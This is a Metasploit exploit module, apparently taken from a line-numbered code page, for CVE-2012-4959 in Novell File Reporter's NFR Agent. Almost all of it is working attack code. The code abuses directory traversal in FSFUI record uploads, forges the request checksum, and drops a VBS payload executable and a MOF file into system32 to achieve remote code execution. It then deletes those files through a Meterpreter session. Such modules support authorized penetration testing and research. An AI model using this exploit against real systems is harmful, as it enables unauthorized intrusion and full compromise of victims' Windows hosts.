|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150  |  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote  Rank = GreatRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::EXE  include Msf::Exploit::WbemExec  def initialize(info = {})  super(update_info(info,  'Name' => 'NFR Agent FSFUI Record File Upload RCE',  'Description'=> %q{  NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload  arbitrary files via a directory traversal while handling requests to /FSF/CMD with  FSFUI records with UICMD 130. This module has been tested successfully against NFR  Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).  },  'License'=> MSF_LICENSE,  'Author' =>  [  'juan vazquez'  ],  'References' =>  [  [ 'CVE', 'CVE-2012-4959'],  [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959' ]  ],  'Payload'=>  {  'Space' => 2048,  'StackAdjustment' => -3500  },  'DefaultOptions' =>  {  'WfsDelay' => 20  },  'Platform' => 'win',  'Targets'=>  [  #Windows before Vista  [ 'Automatic', { } ]  ],  'DefaultTarget'=> 0,  'DisclosureDate' => 'Nov 16 2012'))  register_options(  [  Opt::RPORT(3037),  OptBool.new('SSL', [true, 'Use SSL', true]),  OptInt.new('DEPTH', [true, 'Traversal depth', 6])  ], self.class)  end  def on_new_session(client)  return if not @var_mof_name  return if not @var_vbs_name  if client.type != "meterpreter"  print_error("NOTE: you must use a Meterpreter payload in order to automatically clean up.")  print_error("The following files must be removed manually:")  print_error("The VBS payload: %WINDIR%\\system32\\#{@var_vbs_name}.vbs")  print_error("The MOF file (%WINDIR%\\system32\\wbem\\mof\\good\\#{@var_mof_name}.mof)")  return # That's it  end  # stdapi must be loaded before we can use fs.file  client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")  begin  print_good("Deleting the VBS payload \"#{@var_vbs_name}.vbs\" ...")  windir = client.fs.file.expand_path("%WINDIR%")  client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs")  print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...")  cmd = "#{windir}\\system32\\attrib.exe -r " +  "#{windir}\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof"  client.sys.process.execute(cmd, nil, {'Hidden' => true })  client.fs.file.rm("#{windir}\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof")  rescue ::Exception => e  print_error("Exception: #{e.inspect}")  end  end  def peer  "#{rhost}:#{rport}"  end  def exploit  # In order to save binary data to the file system the payload is written to a .vbs  # file and execute it from there.  @var_mof_name = rand_text_alpha(rand(5)+5)  @var_vbs_name = rand_text_alpha(rand(5)+5)  print_status("Encoding payload into VBS...")  payload = generate_payload_exe  vbs_content = Msf::Util::EXE.to_exe_vbs(payload)  print_status("Generating VBS file...")  mof_content = generate_mof("#{@var_mof_name}.mof", "#{@var_vbs_name}.vbs")  print_status("#{peer} - Uploading the VBS file")  worked = upload_file("WINDOWS\\system32\\#{@var_vbs_name}.vbs", vbs_content)  unless worked  fail_with(Failure::NotVulnerable, "Failed to upload the file")  end  print_status("#{peer} - Uploading the MOF file")  upload_file("WINDOWS\\system32\\wbem\\mof\\#{@var_mof_name}.mof", mof_content)  end  def upload_file(filename, content)  traversal = "..\\" * datastore['DEPTH']  traversal << filename  record = "<RECORD><NAME>FSFUI</NAME><UICMD>130</UICMD><FILE>#{traversal}</FILE><![CDATA[#{content}]]></RECORD>"  md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase  message = md5 + record  res = send_request_cgi(  {  'uri' => '/FSF/CMD',  'version' => '1.1',  'method'=> 'POST',  'ctype' => "text/xml",  'data'=> message,  })  if res and res.code == 200 and res.body.include? "<RESULT><VERSION>1</VERSION><STATUS>0</STATUS></RESULT>"  print_warning("#{peer} - File successfully uploaded: #{filename}")  else  print_error("#{peer} - Failed to upload the file")  return false  end  true  end end  |